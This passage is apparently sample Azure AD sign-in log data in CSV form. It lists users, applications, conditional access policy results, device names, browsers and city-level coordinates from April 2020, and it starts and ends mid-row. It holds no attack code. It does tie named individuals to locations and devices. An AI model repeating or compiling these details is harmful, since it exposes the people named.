'8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",145a2518-4c12-4fab-9b1e-66eb05ce2300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,145a2518-4c12-4fab-9b1e-66eb05ce2300,SigninLogs,Sucess,32.0840416,34.88776016
+103,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:17.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5222cbe-e159-458a-bc78-2e6899ef0f1a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8303a9c8-e3cd-4170-aa12-9fba25111b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,8303a9c8-e3cd-4170-aa12-9fba25111b00,SigninLogs,Sucess,33.7984581,-84.38828278
+104,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d0958eba-e3aa-44fb-99f1-d4d9cbb0c48d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f2f2811300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,1dbd81fd-18f7-4582-ba72-d8f2f2811300,SigninLogs,Sucess,50.6406517,5.572050095
+105,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:30.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc3fc2da-1cb4-4601-b915-2dccc59d9d4f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0ea79661300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0ea79661300,SigninLogs,Sucess,41.90428925,-85.99833679
+106,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b66d511-dc02-4721-9110-2a1269fa58f6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3f80e775-4028-4bc5-9e8b-649b16541100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3f80e775-4028-4bc5-9e8b-649b16541100,SigninLogs,Sucess,41.90428925,-85.99833679
+107,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0565250d-3028-4fcd-a922-60ff26d22827,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",706e1892-a48a-4a34-be7e-87776bba1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,706e1892-a48a-4a34-be7e-87776bba1100,SigninLogs,Sucess,41.90428925,-85.99833679
+108,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:15.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99109f3a-3907-4bef-ad6e-5ff0bb57b012,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d6103972-d51f-4bff-802b-f440e7de1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d6103972-d51f-4bff-802b-f440e7de1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+109,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",b2355a94-e8b5-42de-b49a-7e28072d0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b2355a94-e8b5-42de-b49a-7e28072d0100,SigninLogs,Sucess,35.01296997,-80.93171692
+110,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:15.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0757aec6-6704-49e0-920d-4afaf0e42b39,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 